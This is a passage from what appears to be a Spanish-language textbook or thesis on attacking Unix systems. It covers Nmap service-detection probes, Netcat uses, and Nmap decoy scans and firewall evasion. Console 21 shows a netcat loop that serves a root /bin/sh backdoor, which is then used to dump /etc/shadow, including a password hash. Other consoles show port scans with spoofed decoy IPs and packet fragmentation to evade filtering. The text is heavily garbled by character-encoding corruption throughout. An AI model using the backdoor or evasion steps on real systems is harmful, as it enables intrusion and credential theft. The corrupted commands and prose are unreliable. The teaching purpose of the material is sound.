$a'

coincidencia

co "leta

;CduraD**0

co o

describe

la

docu entaci8n># el servicio está identi/icado ' ter ina el análisis de ese "uerto. ;.+.En algunos otros casos# "uede $aber una coincidencia "arcial o CblandaD# que s8lo logra identi/icar de qué servicio se trata. Entonces lo que $ace @ a" es continuar ;ir al "aso 1># con la es"eranza de obtener luego una coincidencia CduraDH "ero lo $ace restringiendo el conjunto de probes s8lo a aquellos que reconocen en /or a co "leta este servicio ;' no a todos>. ;.;.Fa bién "uede que no $a'a coincidencias con este C@ull ProbeD# "or lo que se va al "aso 1. <. Co o todav)a no se envi8 nada "or la cone9i8n# se dará prioridad en el análisis a los probes que posean en su listado de puertos el n'mero de puerto destino de la conexi-n. Estos nG eros de "uertos de cada sentencia Probe sirven "ara indicar que el is o tiene ás "robabilidades de é9ito con estos "uertos que con otros. !or eje "lo# el !robe Coracle( tnsD inclu'e en su listado de "uertos el *52*# 'a que el servicio F@, :istener de ?racle es alta ente "robable que se encuentre escuc$ando en dic$o "uerto. @ueva ente# se env)an los "robes seleccionados ' al co "arar las res"uestas con la base "ara ver si $a' coincidencias# las "osibilidades vuelven a ser tres% <.7.=a' coincidencia co "leta. ,e ter ina el análisis "ara este "uerto. <.+.=a' coincidencia "arcial. ,e restringen los "robes a realizar co o se describi8 en el "aso -.2 ' se continGa al "aso 5. <.;.@o $a' coincidencia. ,e salta al "aso 5. . En la a'or)a de los casos a esta altura 'a $ubo algGn ti"o de coincidencia. ,in e bargo# aqu) es donde se to a el conjunto de probes restantes "endientes de "rueba*2. ' se ejecutan. :a desventaja de llegar a este "unto es que no se "ueden reutilizar las cone9iones establecidas
**0 :a coincidencia co "leta o CduraD es aquella que logra identi/icar la "osibles% qué ,o/tIare envi8 los datos ' su versi8n e9acta o con el ,? en el que corre# 8dulos del servicio inclu)dos# etc. a'or cantidad de datos

u' a"ro9i ada# junto a veces

*2. En esta instancia este conjunto de probes restantes "endientes de ejecuci8n se /iltra "revia ente "or el valor de rarit1 ;CrarezaD> que se utiliza en la detecci8n. Fodos los "robes que tengan rarit1 igual o enor al valor del escaneo# quedan seleccionados.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. O1 de 2*.

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

"revia ente# 'a que se $an enviado datos anterior ente ' esto "uede CensuciarD o corro "er la "ruebaH es as) que "or cada probe "endiente se establece una nueva cone9i8n. #. ,i no es "osible reconocer qué servicio se encuentra del otro lado de la cone9i8n ;no $ubo ninguna coincidencia> ' "or otro lado se cuenta con alguna res"uesta a algGn probe# @ a" "ro'ecto. AGn si se llega al "unto 5# es i "ortante destacar que @ a" intenta acelerar el test co "leto en todo sentido# contando con una base de /ir as o"ti izadas ' bien organizadas# 'endo de lo es"ec)/ico. Fa bién cuenta con ás genérico ' utilizado a lo u' ás uestra "or consola el /inger"rint res"ectivo "ara que el usuario env)e dic$a /ir a a los desarrolladores del

u' "oderosas ' versátiles ca"acidades de

elaboraci8n de reglas# co o las o"ciones de softmatc ' rarit1)A)H alteraci8n del /lujo descri"to en caso de contingencias con la sentencia fallbackH so"orte de scri"ts "ara "rocesa iento "ost(detecci8n "or si las e9"resiones regulares no son su/icientes "ara detectar ciertos servicios# etc. :as directivas

ás i "ortantes de la base de /ir as*22 son%
-T,PFKDP0 TDe !rip!i%n>FT.tring a en@iar>F

4ro(e: ,inta9is% Probe El string a enviar "er ite caracteres t)"icos de esca"e# co o ff# ft# fn ' f9== "ara los nG eros $e9adeci ales. matc9: ,inta9is% mat!' !erl% m;-eDpre
TnombreA er@i!io>FTpatr%n>F-informa!i%n 7e @er i%n0

El "atr8n de coincidencia consiste en una e9"resi8n regular# en /or ato
i%n0;-op!ione 0.

:a in/or aci8n de versi8n "uede utilizar

las coincidencias de la e9"resi8n regular ; ediante las variables g*# g2#
*2* Fodos los probes "oseen un valor de rarit1# que en un escaneo se lo con/igura con el "ará etro version'intensit'# ' va del . al 0. Establecerlo en . resulta "uede tardar uc$o ás# "ero será ca"az de detectar servicios enos que un 5anner @rabbing# 'a que s8lo lo "osee el @ull !robe. ,i se establece el intensit1Crarit1 en 0# @ a" u' "oco /recuentes en "uertos u' "oco /recuentes ta bién. :a intensidad "or de/ecto es de +. *22 !ara otras directivas# co o rarit1# "orts# so/t atc$# /allbac6# etc.# re/erirse a la docu entaci8n ;aunque se deducen de los e9"licado aqu)>% $tt"%&&n a".org&vscan& Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. O5 de 2*.

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

etc.> ' ade ás "er ite de/inir ca "os co o resultado ;Cno bre de "roductoD# CversionD# Cin/oD# Csiste a o"erativoD# etc.>. En la Consola *0 se uestra un eje "lo de la /or a en que @ a" al acena

tanto los probes co o el análisis de las res"uestas gracias a la sentencia matc . Básica ente la estructura consiste en%
● ● ● ●

@ull !robe _ ?"ciones del !robe b Conjunto !robe A _ ?"ciones del !robe b Conjunto S...T !robe B _ ?"ciones del !robe b Conjunto de

atc$ del @ull !robe. atc$ del !robe B.

atc$ del !robe A

El "ri er "robe del arc$ivo es el @ull# seguido "or unos cuantos matc con 5anners de los servicios de FF!# ,,=# ,MF! ' L@C. En el segundo !robe se a"recian las directivas de nivel de rarit1 ' de "uertos t)"icos donde el Pet<equest tiene a'or "robabilidad de coincidencia# junto con un atc$ es"ec)/ico "ara el ,ervidor 4eb C$ero6ee.
N Nmap er@i!e 7ete!tion probe "i t -Q- mo7e: fun7amenta"L -QN M87: nmap- er@i!e-probe 6))0 (00)-03-0) 05:+0:13U 7oug M ?...@ N T'i i t'e NK22 probe t'at Yu t !ompare anE banner gi@en to u *robe 2$* 9F77 3OO N &ait for at "ea t 6 e!on7 for 7ata. 8t u e7 to be 54 but ome N mtp er@i!e 'a@e "ate"E been in tituting an artifi!ia" pau e 9 ee N B<#TK$<9JgreetApau eJ: in .en7mai"4 for eDamp"e: tota">aitm 6000 ?...@ mat!' ftp m;W((0-- 0.QBTP er@er [9=er ion 9>u---.[>0P:; p;&K-BTPD; @; M1; o;KniD; ?...@ mat!' ' mFW..?-9-[7.0P:-Open..?A9-[>.0P: BreeC.D-9-[70P:[nF p;Open..?; @;M(; i;BreeC.D M3L proto!o" M1; o;BreeC.D; ?...@ mat!' mtp mFW((0 --[>A0P <.3TP 9--[>A.0P: [9Debian;HNK[:[r[nF p;Po tfiD mtp7; ';M1; o;2inuD; i;Debian; ?...@ mat!' @n! mFW$BC 003[.009[7:[nMF p;=N,; i;proto!o" 3.M1; ?...@ *robe 2$* Bet/e3uest 3OBC2 / K22*/1.0PrPnPrPnO raritE 1 port 14704794)0)54))4113413941+34()04+974505451+451545+0455+45914631?...@ "port ++3 ?...@ mat!' 'ttp mFW?TTP;1[.0 [7[7[7 .Q[r[n.er@er: ,'ero6ee;9[7--.[>0P:[r[nF p;,'ero6ee 'ttp7; @;M1;

Consola *0% Finger"rints de ,ervicios de @Ma"% arc$ivo de Probes ' <es"uestas

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. OJ de 2*.

Ca")tulo J. ( Ca")tulo J. ,o/tIare "ara <econoci iento Activo

/ap6tulo #. Ao=t@are para Reconocimiento Activo
2na vez recorridas las técnicas ás "o"ulares de releva iento activo de in/or aci8n de una red ' $ost objetivo en su /aceta te8rica# en este ca")tulo se "rovee una "equeBa reco"ilaci8n e introducci8n del so/tIare general ente utilizado "ara uno o varios objetivos descri"tos "revia ente% Escaneo de "uertos rá"ido# "reciso ' sigiloso. 5etectar ' Evitar los 75,s&7!,s# etc.
● ●

● ●

ecanis os de de/ensa% /ireIalls# routers#

A"rovec$ar las debilidades del objetivo. Construir $erra ientas "ersonalizadas $aciendo uso de la ca"acidad de reutilizaci8n ' auto atizaci8n de otras ás genéricas.

J.*. @etcat
@etcat*2- es quizá la $erra ienta ás versátil ' "o"ular que e9iste "ara ejorada ' $ac6ear en la redH tanto es as) que se lo suele conocer co o la Cnavaja suiza ultiusoD. :a versi8n original ;que data de *00J> /ue "osterior ente ada"tada "or varios desarrolladores ' "ro'ectos# "or lo que sus derivados "ueden encontrarse bajo el no bre de nc, ncat, pnetcat, socat, sock, socket ' sbd
S47R7U@CT#

ade ás del @GU netcat)AIH todas son versiones que se encuentran a'or)a de los ,iste as ?"erativos ti"o 2ni9.

a "lia ente dis"onibles en la

,u "ro"8sito es servir de C"uenteD "ara enviar ' recibir datos v)a cone9iones FC! o 25!# en /or a interactiva ;desde la consola> o desde scri"ts ' "rogra as. !or eje "lo# ' s8lo "ara dar una idea de su /unciona iento# su co "orta iento "or de/ecto es ace"tar datos "or la entrada estándar*25 ' enviarlos "or una cone9i8n establecida# a la salida estándar. 5e esta ientras que lo que recibe "or la is a lo redirige anera logra ser e9tre ada ente /le9ible ' ada"table

a un sinnG ero de situaciones# 'a que la cone9i8n "uede ser FC! o 25!. Co o analog)a# sirve "ensar en que es un s) il al co ando de 2ni9 CcatD *2J "ero que inclu'e en sus "osibilidades a los soc6ets FC! ' datagra as 25!.
*2- @etcat original% $tt"%&&III.vulnIatc$.org&netcat& *21 P@2 @etcat% $tt"%&&netcat.source/orge.net& *25 Ler Plosario% Entrada Estándar ;,F57@># ,alida Estándar ;,F5?2F># ,alida de Estándar de Errores ;,F5E<<># "ág. *02. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. O+ de 2*.

Ca")tulo J. ( J.*.@etcat

Entre sus usos t)"icos ' "osibles se encuentra% *. !robar ' e9"lorar "osibilidades con a"licaciones de red# siendo netcat el so/tIare que si ule ser el cliente o servidor. 2. C5ialogarD anual ente con un servicio so/tIare en un "rotocolo inteligible "ara un usuario técnico# co o "or eje "lo =FF!# !?!-# ,MF!# FF!# etc. Ler Consola 2.. -. ,ervir de back door. Al estar inclu)do "or de/ecto en la a'or)a de versiones de 2ni9# es "robable que un atacante luego de obtener acceso a un servidor con/igure un netcat "ara servir un s$ell re oto ;Consola 2*># arc$ivos del servidor co "ro etido# o cualquier otra /unci8n. 1. 2tilizarlo de !ro9' de ,oc6ets ;o cone9iones>% !or eje "lo# si se necesita redirigir una cone9i8n desde 7nternet a una áquina es"ec)/ica de la :A@ que se encuentra detrás de un $ost $aciendo @AF*2+# netcat se "uede utilizar en dic$o $ost "ara redirigir una cone9i8n $acia el destino /inal dentro de la :A@. :o interesante de esto es que netcat no necesitará de "rivilegios de ad inistrador# "udiendo realizarlo cualquier usuario no "rivilegiado*2O. 5. Escaneo de "uertos% ,i no se dis"one de @ a" o algGn otro "ort scanner# @etcat "osee ca"acidades de escaneador de "uertos. Ler Consola 22. J. !ost(intrusi8n% ,i se logra co "ro eter un $ost# es reco endable to ar las "recauciones del caso antes de enviar al "ara is o un 6it de $erra ientas a'or análisisH consu ir "oco anc$o de banda de la red objetivo es

una de ellas# "or lo que una versi8n de @etcat co "ilado estática ente*20
*2J Cat% Co ando 2ni9 que concatena una entrada a la salida estándar. :a entrada "uede ser un arc$ivo ;uno de los ele entos que son "ilares del odelo 2ni9>. *2+ Ler Plosario% @AF N @etIor6 Address Franslation# "ág. *0-. *2O Cualquier "rogra a con "rivilegios de usuario Cno(rootD "uede escuc$ar "or cone9iones entrantes en "uertos a'ores a *.21H ésta es una li itaci8n del eje "lo. Ade ás# si se "oseen ás sencillo realizar la redirecci8n de cone9iones o ento de traducirse de c8digo /uente a c8digo de "er isos de ad inistrador en el equi"o# es *20 Ejecutable estático% A un "rogra a# en el

odi/icando las reglas de /iltrado del nGcleo ;i"tables&net/ilter# !F# 7"/I# AC:s# etc.>. áquina ;eta"a de co "ilaci8n># se lo enlaza a la o las bibliotecas de c8digo de las cuales de"ende "ara "oder ejecutarse correcta ente. Este enlace "uede ser estático o diná ico. Cada uno tiene ventajas ' desventajas
S,2@U:7@RT

. En este caso se "ro"one la utilizaci8n de un

ejecutable estático "ara de"ender lo

enos "osible del siste a o"erativo ' el so/tIare

instalado en el siste a co "ro etido. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,taticUlibrar' Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. OO de 2*.

Ca")tulo J. ( J.*.@etcat

brindará un e9celente balance entre ta aBo ' "restaciones.
marcelo@saturno:~$ !at > goog"eA7i!tA ear!'.tDt BC2 /searcIQ3RSuanTperez marcelo@saturno:~$ marcelo@saturno:~$ n! >>>.goog"e.!om )0 T goog"eA7i!tA ear!'.tDt ?TTP;1.0 (00 O5 Date: .un4 (3 3ar (00) (0:56:5) H3T ,ontent-TEpe: teDt;'tm"L !'ar et18.O-))59-1 ,a!'e-,ontro": pri@ate .et-,oo6ie: P$<B18D13((17+5)5576b67(:T311(063060+5:2311(063060+5:.1D>NttP@OqAT/G.aL eDpire 1Tue4 (3-3ar-(010 (1:00:+5 H3TL pat'1;L 7omain1.goog"e.!om .et-,oo6ie: ..1R01an='biC>UG_"egL pat'1; ear!' .er@er: g> T'tm">T'ea7>Tmeta 'ttp-equi@1!ontent-tEpe !ontent1VteDt;'tm"L !'ar et18.O-))59-1V>Ttit"e>Yuan pereO - Hoog"e .ear!'T;tit"e> ... marcelo@saturno:~$ n! pop.mai".Ea'oo.!om.ar 110 PO5 'e""o from popgate (.3).7 on pop110.p"u .mai".mu7.Ea'oo.!om F-C/ SuanNperez@DaIoo.com.ar PO5 pa >or7 require7. *%-- pepe -<$$ in@a"i7 u er;pa >or7 F-C/ Suanperez PO5 pa >or7 require7. *%-- Suancito PO5 mai"7rop rea7E4 + me age 9(3+)) o!tet : 91)09057 (60)33()00: list PO5 + me age 9(3+)) o!tet : 1 3)13 ( 6(17 3 3793 + 77+5 . 3uit PO5 er@er igning off. marcelo@saturno:~$

Consola 2.% @etcat co o cliente de a"licaciones de red# en este caso =FF! ' !?!-

En la Consola 2. se

uestra una sesi8n =FF! "ri ero ' !?!- des"ués#

a bas manuales. En negrita están los co andos ejecutados "or el usuario# ' "osterior ente las res"uestas devueltas "or el servidor. Es interesante observar que cierta in/or aci8n Gtil se "uede obtener anejando estos "rotocolos a bajo nivel# lo que se describi8 co o Banner Prabbing en el a"artado 5.2.*.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. O0 de 2*.

Ca")tulo J. ( J.*.@etcat
!-er<idor" root@ubuntu&ser<er:~$ >'i"e -- ` -e ;tmp;.!errar -e ;bin; 'L 7one

00L7o n! -" -p 15679

!$liente" marcelo@saturno:~$ n! 19(.16).0.60 15679 ls &l tota" 10+ 7r>Dr-D--- 3 mar!e"o mar!e"o +096 (007-01-(7 16:56 !omp"etoAgrafi!o.'tm" -r>-r--r-- 1 mar!e"o mar!e"o +(+)( (007-01-(7 16:56 !omp"eto.'tm" -r>------- 1 mar!e"o mar!e"o (00)0 (007-01-(7 16:56 !omp"eto.nbe -r>-r--r-- 1 mar!e"o mar!e"o 11)1) (007-01-(7 15:17 7efau"tfu""p"ugin .'tm" -r>-r--r-- 1 mar!e"o mar!e"o 1301+ (007-01-(7 1+:3) 7efau"t.'tm" 7r>Dr-Dr-D ( mar!e"o mar!e"o +096 (007-01-(7 16:3( eDp"oit 7r>Dr-Dr-D ( mar!e"o mar!e"o +096 (007-01-(7 13:05 too" p>d ;'ome;mar!e"o Iostname ubuntu- er@er uname &a 2inuD ubuntu- er@er (.6.15-51- er@er N1 .3P Tue Beb 1( 17:1(:1) KT, (00) i6)6 HNK;2inuD !$trlT$" marcelo@saturno:~$ n! 19(.16).0.60 15679 > er@erA 'a7o> !at ;et!; 'a7o> tou!' ;tmp;.!errar !$trlT$" marcelo@saturno:~$ nc 192.168.0.60 11609 9KN5NO&N: -19(.16).0.600 15679 9*: : ,onne!tion refu e7 marcelo@saturno:~$ !at er@erA 'a7o> root:Q:135(6:0:99999:7::: 7aemon:Q:135(6:0:99999:7::: bin:Q:135(6:0:99999:7::: E :Q:135(6:0:99999:7::: En!:Q:135(6:0:99999:7::: game :Q:135(6:0:99999:7::: man:Q:135(6:0:99999:7::: "p:Q:135(6:0:99999:7::: mai":Q:135(6:0:99999:7::: ne> :Q:135(6:0:99999:7::: uu!p:Q:135(6:0:99999:7::: proDE:Q:135(6:0:99999:7::: >>>-7ata:Q:135(6:0:99999:7::: ba!6up:Q:135(6:0:99999:7::: "i t:Q:135(6:0:99999:7::: ir!:Q:135(6:0:99999:7::: gnat :Q:135(6:0:99999:7::: nobo7E:Q:135(6:0:99999:7::: 7'!p:`:135(6:0:99999:7::: E "og:`:135(6:0:99999:7::: 6"og:`:135(6:0:99999:7::: mar!e"o:M1Mt03?R#'BM;,P;>(t>5$n1DGr_P0eB(1:135+0:0:99999:7::: '7:`:135+0:0:99999:7::: ftp:`:139++:0:99999:7::: marcelo@saturno:~$

Consola 2*% Consola <e ota v)a @etcat. En negrita están los co andos ti"eados "or el cliente

En la Consola 2* se

uestra otro eje "lo de uso de @etcat# esta vez

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 0. de 2*.

Ca")tulo J. ( J.*.@etcat

relacionado con la sencilla e9tracci8n de in/or aci8n re ota de un equi"o# co o es el caso de una "uerta trasera ;back door>. !ri ero se ejecuta en el servidor un loop ;bucle> donde sie "re se sirven cone9iones ;en este caso se "oseen "er isos de root> $asta que no e9ista el arc$ivo &t "&.cerrar. :uego# desde el nodo cliente# el usuario se conecta a dic$o servidor ' ejecuta di/erentes co andos que son inter"retados "or &bin&s$. ,i bien "osterior ente se /inaliza la cone9i8n con un Ctrl_C# gracias a que el netcat en el servidor se encuentra dentro de un bucle I$ile ;' a que sigue sin e9istir el arc$ivo &t "&.cerrar># el cliente se "uede volver a conectar# esta vez redirigiendo la salida a un arc$ivo. As) se obtiene el arc$ivo de s$adoI*-. en el servidor. !or Glti o se crea el arc$ivo &t "&.cerrar con el co ando touc$# ' se veri/ica que la "uerta trasera $a'a quedado cerrada.*-*
marcelo@saturno:~$ u7o n! -@@ -O -p )0 19(.16).0.30 (1 53 79-)( !i!"on -19(.16).0.300 (1 9ftp: open !i!"on -19(.16).0.300 53 97omain: open !i!"on -19(.16).0.300 )( 9*: : ,onne!tion refu e7 !i!"on -19(.16).0.300 )1 9*: : ,onne!tion refu e7 !i!"on -19(.16).0.300 )0 9>>>: : ,onne!tion refu e7 !i!"on -19(.16).0.300 79 9finger: : ,onne!tion refu e7 ent 04 r!@7 0 marcelo@saturno:~$ u7o n! -@@ -O -p )0 19(.16).0.30 (1 53 79-)( ent 04 r!@7 0 !$trlT$" marcelo@saturno:~$ u7o n! -@@ -O -p )0 -> 5 19(.16).0.30 (1 53 79-)( !i!"on -19(.16).0.300 (1 9ftp: open !i!"on -19(.16).0.300 53 97omain: open !i!"on -19(.16).0.300 )( 9*: : ,onne!tion time7 out !i!"on -19(.16).0.300 )1 9*: : ,onne!tion time7 out !i!"on -19(.16).0.300 )0 9>>>: : ,onne!tion time7 out !i!"on -19(.16).0.300 79 9finger: : ,onne!tion time7 out ent 04 r!@7 0 marcelo@saturno:~$

Consola 22% Escaneo si "le de "uertos con @etcat

En esta Glti a consola se el escaneo de "uertos# "or

uestra otra caracter)stica incor"orada de netcat%

edio de la o"ci8n (z ;"or C$ero'6C? modeD ( Modo de

entrada&salida cero>. El "ri er eje "lo escanea los "uertos destino 2*# 5- ' el rango +0 al O2 de la 7! *02.*JO...-.# /ijando el "uerto origen al O. ;'a que "uede "asar "or edio de algunos /ireIalls sin estado>H la o"ci8n (vv $ace que se

*-. Arc$ivo s ado.% Arc$ivo de contraseBas del siste a o"erativo# al acenado en /or a de C/unci8n resu enD o as , Es necesario "oseer "er isos de root "ara leerlo. *-* ,i bien la "uerta trasera qued8 cerrada# a /ines de conseguir e/ectiva ente $izo. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 0* de 2*. a'or si "licidad en el eje "lo se $an obviado "asos que di/icultar)an al ad inistrador el rastreo de qué es lo que el atacante

Ca")tulo J. ( J.*.@etcat

uestre

ás in/or aci8n "or consola del "rogreso de la o"eraci8n. is a 7!# "ero en este

En el segundo eje "lo se intenta nueva ente con la

caso se "uede a"reciar qué sucede si el objetivo "osee un /ireIall con "ol)ticas de 5<?!% @etcat queda CbloqueadoD en un "uerto /iltrado es"erando a que e9"ire la cone9i8n "ara "asar al siguiente. !ara evitar esto se "uede establecer el ti eout con el "ará etro (I# que en el tercer intento se estableci8 en 5 segundos. ,i bien es interesante la variedad de "osibilidades que o/rece @etcat# es i "ortante resaltar que los escaneos que realiza son del Fi"o Connect# "or lo que son los ás CruidososD en cuanto al trá/ico ' logs generados.

J.2. @ a" N Más ?"ciones
,i bien en el ca")tulo anterior se describieron las di/erentes varias o"ciones ' ca"acidades grá/ica. aneras que un ás el "ort scanner t)"ica ente obtiene in/or aci8n del objetivo# @ a" en s) "osee ás que "er iten ajustar ' "ersonalizar "roceso de "ort scanning# o $acerlo ás sencillo e intuitivo gracias a su inter/az

J.2.*. 5eco's ;o C,eBuelosD>
@ a" "er ite $acer el "ort scanning agregándole CseBuelosD al "roceso# es decir# 9aciendo que pare3ca para el destino que el portscan proviene de di=erentes I4s además de la del atacante. Esto lo logra $aciendo spoofing de una o varias 7!s ;co o en el 7dle ,can># ' generando trá/ico co o si varios escaneos de "uertos se $icieran al is o tie "o desde di/erentes lugares. ,i bien esta táctica "uede con/undir al objetivo en la identi/icaci8n del origen del "ortscan# la direcci8n 7! donde se ejecuta @ a" debe ser inclu)da# 'a que de otra anera @ a" no "odr)a obtener resultados. Ade ás# es i "ortante ás evidencia indicando el origen del uestra en la que los $osts que real ente utilizan las 7!s /alsi/icadas e9istan ' estén activos# 'a que de otra /or a el escaneo dejar)a "ortscanH "uede verse uno de los Consola 2-. 2na o"ci8n adicional que se ve en la is a es que es "osible indicarle a @ a" en qué orden ubicar el "ortscan real ;no /alsi/icando la 7! de origen>#
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 02 de 2*.

otivos en los A<! requests que $ace el

objetivo en la Ca"tura *5# "roducto de la ejecuci8n de @ a" que se

Ca")tulo J. ( J.2.@ a" N Más ?"ciones

ubicando CMED en la lista de deco's. 5e lo contrario la ubicaci8n será aleatoria.
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap &< &s- &) 192.168.0.1005192.168.0.205GC 192.168.0. 0 &p 21522580 .tarting Nmap +.60 9 'ttp:;;nmap.org : at (00)-0+-07 ((:53 #$T 8nitiating #$P Ping .!an at ((:53 .!anning 19(.16).0.30 -1 port0 ,omp"ete7 #$P Ping .!an at ((:534 0.03 e"ap e7 91 tota" 'o t : 8nitiating ./N .tea"t' .!an at ((:53 .!anning !i!"on 919(.16).0.30: -3 port 0 Di !o@ere7 open port (1;t!p on 19(.16).0.30 Di !o@ere7 open port ((;t!p on 19(.16).0.30 ,omp"ete7 ./N .tea"t' .!an at ((:534 (.33 e"ap e7 93 tota" port : ?o t !i!"on 919(.16).0.30: appear to be up ... goo7. 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< (1;t!p open ftp ((;t!p open ' )0;t!p fi"tere7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: $ea7 7ata fi"e from: ;'ome;mar!e"o; r!;nmap; 'are;nmap Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in (.)70 e!on7 $a> pa!6et ent: (( 9966C: F $!@7: 3 9130C: marcelo@saturno:~/src/nmap/bin$

Consola 2-% !ortscan en @ a" con 5eco's

En la Ca"tura *5# donde se "uede a"reciar un escaneo con 5eco's# interactGan los siguientes $osts% A> ?rigen @ a"% 7! *02.*JO...2 N MAC address% ..%*+%-*%0J%5b%*/ B> 7! Falsi/icada *% *02.*JO...*.. N MAC address% ..%.c%20%0.%2a%2d C> 7! Falsi/icada 2% *02.*JO...2. N MAC address% ..%.c%20%OJ%*2%a5> =ost ?bjetivo% *02.*JO...-. N MAC address% ..%.c%20%e*%a2%2J :o interesante es que co o se detall8 en el 7dle ,can ;"ágina 5*># todo $ost que recibe un ,K@_ACR devuelve un <,F al origen. @ a"# aGn cuando el ,K@_ACR le es Gtil ' su/iciente "ara deter inar que el "uerto está abierto# si ula el co "orta iento que ado"ta el resto de los $osts cu'as 7!s /ueron /alsi/icadas ;"aquetes 2- ' 20># es decir# env)a un <,F ta bién. Co o "rinci"al desventaja al $abilitar esta o"ci8n en un "ortscan se "uede que conlleva. En negrita se indican algunos "untos interesantes de la ca"tura# co o el s"oo/ing ' las "eticiones A<! contestadas "or el $ost CoriginalD. encionar la lentitud

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 0- de 2*.

Ca")tulo J. ( J.2.@ a" N Más ?"ciones

?...@ Paquete Nro: 3 - Tiempo: 0.06957) 3a! Origen: 00:10: 1:96:1b:16 !%" -> 3a! De tino: 00:0!:(9:e1:a(:(6 9D: 8P Origen: 192.168.0.100:.2811 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: + - Tiempo: 0.075)30 3a! Origen: 00:0!:(9:e1:a(:(6 9D: -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:0!:(9:e1:a(:(6 9D: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.100* Te"" 19(.16).0.30 ?...@ Paquete Nro: 6 - Tiempo: 0.0771+5 3a! Origen: 00:0!:(9:90:(a:(7 9C: -> 3a! De tino: 00:0!:(9:e1:a(:(6 9D: 8P Origen: 00:0!:(9:90:(a:(7 9C: -> 8P De tino: 00:0!:(9:e1:a(:(6 9D: Proto!o"o: #$P De !rip!i%n: 192.168.0.100 is at 00:0c:29:90:2a:2d !(" ?...@ Paquete Nro: ) - Tiempo: 0.07)565 3a! Origen: 00:0!:(9:e1:a(:(6 9D: -> 3a! De tino: 00:0c:29:90:2a:2d !(" 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 ?...@ Paquete Nro: 10 - Tiempo: 0.0)0503 3a! Origen: 00:0c:29:90:2a:2d !(" &' Gac )estino: 00:0c:29:e1:a2:26 !)" 8P Origen: 192.168.0.100:+()55 -> 8P De tino: 192.168.0. 0:22 Proto!o"o: T,P De !rip!i%n: .2811 ' 22 ?/-2@ -e3R1 7enR0 ?...@ Paquete Nro: (1 - Tiempo: 0.0)77(6 3a! Origen: 00:17:31:96:5b:1f 9#: -> 3a! De tino: 00:0!:(9:e1:a(:(6 9D: 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: (( - Tiempo: 0.0))0+6 3a! Origen: 00:0!:(9:e1:a(:(6 9D: -> 3a! De tino: 00:17:31:96:5b:1f 9#: 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: (3 - Tiempo: 0.0))06) 3a! Origen: 00:17:31:96:5b:1f 9#: -> 3a! De tino: 00:0!:(9:e1:a(:(6 9D: 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: .2811 ' 22 ?/-2@ -e3R1 7enR0 ?...@

Ca"tura *5% Ca"tura de un ,'n ,can con 5eco's

J.2.2. Evitando FireIalls
@ a" brinda ade ás algunas o"ciones que "er iten evitar el /iltrado de /ireIalls S@MA!UF4ELT# co o "or eje "lo los Csin estadoD o stateless# con/igurados# o si "le ente débiles%
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 01 de 2*.

al

Ca")tulo J. ( J.2.@ a" N Más ?"ciones

2ra)mentar los paquetes que se env)an% :a o"ci8n C(/D o C(( tuD $ace que @ a" /rag ente los "aquetes 7! en Glti"los de O# $aciendo caso o iso del MF2 que "osea con/igurada la inter/az de red. El "ri er "ará etro sirve "ara /rag entar en o//sets de O ;C(/D> o *J b'tes ;C(/ (/D># ' el segundo "ara elegir un valor "ersonalizado ;"or eje "lo# C(( tu 21D># sie "re en Glti"los de O. ,in e bargo# es i "ortante aclarar que algunos u' u' di/undidaH los /ireIalls actuales e 75,s directa ente /iltran el contenido /rag entado# 'a que es una técnica de evasi8n resultados "ueden variar. Utili3aci-n de un puerto ori)en =ijo% ,i la red objetivo "osee un /ireIall sin estado o o 5MQ
*-2

al con/igurado# es

u' "robable que deje ingresar a la :A@ ás co unes ;el 4eb>. :a

las "eticiones de cualquier 7! ' el "uerto FC! de origen O. "or

eje "lo# 'a que es uno de los ti"os de trá/ico

